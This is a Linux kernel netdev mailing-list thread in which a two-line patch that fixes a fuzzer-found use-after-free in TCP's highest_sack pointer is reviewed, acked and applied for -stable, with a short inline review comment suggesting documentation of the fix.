From: Marco Grassi @ 2016-08-17 11:10 UTC (permalink / raw)
  To: Cong Wang
  Cc: Eric Dumazet, Greg KH, Linux Kernel Network Developers,
	Yuchung Cheng, Neal Cardwell

Hello, I'm fuzzing with your patch applied and I no longer see the issue
triggering (nor any related ones).

I will keep you updated if something pops up, so we can fix it before it is pushed.

Marco

On Wed, Aug 17, 2016 at 4:32 AM, Cong Wang <xiyou.wangcong@gmail.com> wrote:
> On Tue, Aug 16, 2016 at 1:27 PM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
>> And tcp_add_write_queue_tail() looks like :
>>
>>
>> static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
>> {
>>         __tcp_add_write_queue_tail(sk, skb);
>>
>>         /* Queue it, remembering where we must start sending. */
>>         if (sk->sk_send_head == NULL) {
>>                 sk->sk_send_head = skb;
>>
>>                 if (tcp_sk(sk)->highest_sack == NULL)
>>                         tcp_sk(sk)->highest_sack = skb;
>>         }
>> }
>>
>
> Ah, I never looked into tcp_add_write_queue_tail()...
>
> So this bug seems exist after commit 6859d49475d4f32abe640372117e4b...


* [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
From: Eric Dumazet @ 2016-08-17 12:56 UTC (permalink / raw)
  To: David Miller
  Cc: netdev, Marco Grassi, Yuchung Cheng, Neal Cardwell, Greg KH,
	Ilpo Järvinen

From: Eric Dumazet <edumazet@google.com>

When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
tail of the write queue using tcp_add_write_queue_tail()

Then it attempts to copy user data into this fresh skb.

If the copy fails, we undo the work and remove the fresh skb.

Unfortunately, this undo lacks the change done to tp->highest_sack and
we can leave a dangling pointer (to a freed skb)

Later, tcp_xmit_retransmit_queue() can dereference this pointer and
access freed memory. On regular kernels, where freed memory stays mapped,
this shows up as SACK bugs: tcp_highest_sack_seq() reads the freed skb and
returns garbage instead of tp->snd_nxt. With debug features such as
CONFIG_DEBUG_PAGEALLOC, it can crash the kernel.

This bug was found by Marco Grassi thanks to syzkaller.

Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
Reported-by: Marco Grassi <marco.gra@gmail.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
---
 include/net/tcp.h |    2 ++
 1 file changed, 2 insertions(+)

diff --git a/include/net/tcp.h b/include/net/tcp.h
index c00e7d51bb18..7717302cab91 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
 {
 	if (sk->sk_send_head == skb_unlinked)
 		sk->sk_send_head = NULL;
+	if (tcp_sk(sk)->highest_sack == skb_unlinked)
+		tcp_sk(sk)->highest_sack = NULL;
 }
 
 static inline void tcp_init_send_head(struct sock *sk)
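Review bot: The two added lines in tcp_check_send_head() should carry a comment tying them to tcp_add_write_queue_tail(), which is the only setter shown in this thread and assigns tp->highest_sack to the freshly queued skb only when both sk_send_head and highest_sack were NULL; resetting to NULL is therefore an exact undo of that assignment, but a reader of tcp.h alone cannot see that. Suggest `/* Undo tcp_add_write_queue_tail(): if highest_sack was pointed at this skb it would dangle once the skb is freed. */` above the new check. Whether every consumer of tp->highest_sack (tcp_highest_sack_seq() and friends) already treats NULL as "no SACKed skb" is not visible in the hunk; the commit message implies tcp_highest_sack_seq() is expected to return tp->snd_nxt in that case, which is worth confirming before the -stable backport. As noted in the thread, the helper now resets more than the send head, so a rename in net-next would keep the name honest.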


* Re: [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
From: Neal Cardwell @ 2016-08-17 14:09 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: David Miller, Netdev, Marco Grassi, Yuchung Cheng, Greg KH,
	Ilpo Järvinen

On Wed, Aug 17, 2016 at 8:56 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
>
> From: Eric Dumazet <edumazet@google.com>
>
> When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
> tail of the write queue using tcp_add_write_queue_tail()
>
> Then it attempts to copy user data into this fresh skb.
>
> If the copy fails, we undo the work and remove the fresh skb.
>
> Unfortunately, this undo lacks the change done to tp->highest_sack and
> we can leave a dangling pointer (to a freed skb)
>
> Later, tcp_xmit_retransmit_queue() can dereference this pointer and
> access freed memory. For regular kernels where memory is not unmapped,
> this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
> returning garbage instead of tp->snd_nxt, but with various debug
> features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
>
> This bug was found by Marco Grassi thanks to syzkaller.
>
> Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
> Reported-by: Marco Grassi <marco.gra@gmail.com>
> Signed-off-by: Eric Dumazet <edumazet@google.com>
> Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
> Cc: Yuchung Cheng <ycheng@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>

Acked-by: Neal Cardwell <ncardwell@google.com>

Thanks, Eric.

neal


* Re: [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
From: Cong Wang @ 2016-08-17 16:12 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: David Miller, Linux Kernel Network Developers, Marco Grassi,
	Yuchung Cheng, Neal Cardwell, Greg KH, Ilpo Järvinen

On Wed, Aug 17, 2016 at 5:56 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> From: Eric Dumazet <edumazet@google.com>
>
> When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
> tail of the write queue using tcp_add_write_queue_tail()
>
> Then it attempts to copy user data into this fresh skb.
>
> If the copy fails, we undo the work and remove the fresh skb.
>
> Unfortunately, this undo lacks the change done to tp->highest_sack and
> we can leave a dangling pointer (to a freed skb)
>
> Later, tcp_xmit_retransmit_queue() can dereference this pointer and
> access freed memory. For regular kernels where memory is not unmapped,
> this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
> returning garbage instead of tp->snd_nxt, but with various debug
> features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
>
> This bug was found by Marco Grassi thanks to syzkaller.
>
> Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
> Reported-by: Marco Grassi <marco.gra@gmail.com>
> Signed-off-by: Eric Dumazet <edumazet@google.com>
> Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
> Cc: Yuchung Cheng <ycheng@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>
> ---
>  include/net/tcp.h |    2 ++
>  1 file changed, 2 insertions(+)
>
> diff --git a/include/net/tcp.h b/include/net/tcp.h
> index c00e7d51bb18..7717302cab91 100644
> --- a/include/net/tcp.h
> +++ b/include/net/tcp.h
> @@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
>  {
>         if (sk->sk_send_head == skb_unlinked)
>                 sk->sk_send_head = NULL;
> +       if (tcp_sk(sk)->highest_sack == skb_unlinked)
> +               tcp_sk(sk)->highest_sack = NULL;
>  }
>

Nit: the function name probably needs to change too, since it now
checks more than just send_head. ;) But we can always do this
for net-next, don't let this be a blocker for this security fix.

Reviewed-by: Cong Wang <xiyou.wangcong@gmail.com>

Thanks!


* Re: [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
From: David Miller @ 2016-08-19  6:24 UTC (permalink / raw)
  To: eric.dumazet; +Cc: netdev, marco.gra, ycheng, ncardwell, gregkh, ilpo.jarvinen

From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 17 Aug 2016 05:56:26 -0700

> From: Eric Dumazet <edumazet@google.com>
> 
> When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
> tail of the write queue using tcp_add_write_queue_tail()
> 
> Then it attempts to copy user data into this fresh skb.
> 
> If the copy fails, we undo the work and remove the fresh skb.
> 
> Unfortunately, this undo lacks the change done to tp->highest_sack and
> we can leave a dangling pointer (to a freed skb)
> 
> Later, tcp_xmit_retransmit_queue() can dereference this pointer and
> access freed memory. For regular kernels where memory is not unmapped,
> this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
> returning garbage instead of tp->snd_nxt, but with various debug
> features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
> 
> This bug was found by Marco Grassi thanks to syzkaller.
> 
> Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
> Reported-by: Marco Grassi <marco.gra@gmail.com>
> Signed-off-by: Eric Dumazet <edumazet@google.com>

Applied and queued up for -stable.

